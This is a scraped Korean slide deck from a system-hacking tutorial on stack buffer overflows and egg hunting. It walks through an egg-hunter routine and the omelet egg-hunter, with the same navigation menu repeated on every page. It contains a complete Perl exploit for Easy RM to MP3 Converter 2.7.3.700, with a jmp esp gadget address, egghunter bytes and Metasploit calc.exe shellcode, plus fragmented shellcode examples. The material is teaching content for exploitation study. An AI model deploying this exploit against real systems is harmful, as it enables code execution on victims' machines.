Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
# 현재 가리키고 있는 주소값을 스택에 저장
![Page 27: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/27.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
$ NtAccessCheckAndAuditAlarm을 위해 0x2 를 EAX 삽입(syscall 인자) 후 syscall 호출
![Page 28: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/28.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
% 접근 위반(ACCESS_VIOLATION)이 발생했는지 확인
![Page 29: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/29.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
& EDX 값 복구
![Page 30: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/30.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
구' 접근위반 발생시 시작점(0x12cd6c)로 이동
![Page 31: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/31.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
( Marker 삽입검색대상주소(EDX)를 EDI에 저장 Marker(EAX) 와 검색대상주소(EDI) 비교
![Page 32: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/32.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
) Marker 미 발견시 시작점(0x12cd6c)로 이동
![Page 33: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/33.jpg)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
🔟 Marker 발견시 해당 지점으로 이동
Final Shellcode
![Page 34: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/34.jpg)
Exercise Time :DTarget Info
Win32
Easy RM to MP3 Converter
v.2.7.3.700
Download Link is (http://outofcontrol.co.kr/vulnApp/EasyRM.zip)
Vulnerability Type
Buffer Overflow (Stack Based)
by Parsing Playlist
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
![Page 35: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/35.jpg)
Exercise Time :DTip
Generate Pattern by using mona plugin (!mona pattern_create 30000)
nop sleds (0x90 * N)
Shell code (windows/exec calc.exe)
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
![Page 36: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/36.jpg)
Exercise Time :DExploit Info
.m3u Playlist File Format
length of junk data is 26039
gadget is 0x7608fcfe (From jmp esp MSRMCcodec02.dll)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
![Page 37: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/37.jpg)
Exercise Time :DExploit Code (EggHuntingExploit.pl)
my $file= "EggHuntingExploit.m3u";
my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "\x90" x 25; my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8". "\x77\x30\x30\x74". # this is the marker/tag: w00t "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
# windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc my $shellcode = $padding . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";
open($FILE,">$file"); print $FILE $junk.$eip.$padding.$egghunter."w00tw00t".$shellcode; close($FILE); print "m3u File Created successfully\n";
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
![Page 38: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/38.jpg)
What is the Omelet-Egg-Hunter ?쉘코드 단편화 기술(shellcode fragmentation technique)
Skylined(Berend-Jan Wever)에 의해 소개됨 (http://code.google.com/p/w32-seh-omelet-shellcode/)
공격가능한 벡터가 아주 작은 크기의 Buffer 만을 제공하며, 공격자가 제어 가능한 작은 공간의 여러 메모리 조각뿐일때 유용
기본 개념은 일반적인 Egg-Hunter와 같으나, 아래와 같은 차이점이 존재
최종 쉘코드가 여러 조각으로 나누어진다(여러개의 에그)
최종 쉘코드가 실행되기 전에 재조합 된다(발견된 즉시 실행되지 않음)
일반적인 에그 헌터보다 크기가 더 크다(about 90bytes)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
![Page 39: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/39.jpg)
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
오리지널 쉘 코드 단편화 구성
Length of the Egg
Index Number
3bytes Marker
Fragmented ShellCode (1/n , 2/n, 3/n … n/n)
Omelet-Egg-Hunter 코드
메모리 검색 (search through memory)
모든 에그 찾기(look for all egg)
단편화된 쉘코드를 최종 쉘코드로 조립 (reproduces the original shellcode at the bottom of the stack)
조립된 최종 쉘코드로 이동/실행 (jumps to the reproduced shell code and executes it)
![Page 40: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/40.jpg)
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original ShellcodeFragmented Shellcode 2/3
Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
![Page 41: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/41.jpg)
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original ShellcodeFragmented Shellcode 2/3
Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
Search though memory
!
![Page 42: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/42.jpg)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original ShellcodeFragmented Shellcode 2/3
Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
"
Find Marker
![Page 43: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/43.jpg)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original ShellcodeFragmented Shellcode 2/3
Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
#
Check length/index
![Page 44: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/44.jpg)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
#
reproduces the original shellcode at the bottom of the stack
![Page 45: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/45.jpg)
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
Search though memory
$
![Page 46: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/46.jpg)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
%
Find Marker
![Page 47: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/47.jpg)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
&
Check length/index
![Page 48: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/48.jpg)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
&
reproduces the original shellcode at the bottom of the stack
![Page 49: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/49.jpg)
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43
